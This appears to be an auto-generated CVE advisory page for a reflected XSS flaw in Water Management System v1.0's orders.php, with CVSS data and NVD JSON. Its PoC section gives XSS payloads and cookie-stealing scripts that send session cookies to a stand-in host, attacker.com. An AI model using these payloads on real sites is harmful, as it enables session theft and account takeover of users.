Security Vulnerability Report
中文
CVE-2025-63449 CVSS 5.4 MEDIUM

CVE-2025-63449

Published: 2025-11-03 16:15:37
Last Modified: 2025-11-07 20:44:15

Description

Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /orders.php.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Water Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-63449 PoC - XSS in Water Management System /orders.php --> <!-- This PoC demonstrates a reflected XSS vulnerability --> <!-- Method 1: Using script tag --> <a href="http://target.com/orders.php?parameter=<script>alert(document.cookie)</script>">Click Here</a> <!-- Method 2: Using event handler --> <a href="http://target.com/orders.php?parameter=<img src=x onerror=alert(document.cookie)>">View Order</a> <!-- Method 3: Using SVG tag --> <a href="http://target.com/orders.php?parameter=<svg onload=alert(document.domain)>">Order Details</a> <!-- Example exploitation with cookie stealing --> <script> // Steal session cookie var cookie = document.cookie; var img = new Image(); img.src = "http://attacker.com/steal?cookie=" + encodeURIComponent(cookie); </script> <!-- Full PoC URL --> http://target.com/orders.php?order_id=<script>fetch('http://attacker.com/log?c='+document.cookie)</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63449", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:37.170", "lastModified": "2025-11-07T20:44:15.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /orders.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C58F1E69-BA8D-4995-BB68-311AC61B76C7"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-9", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}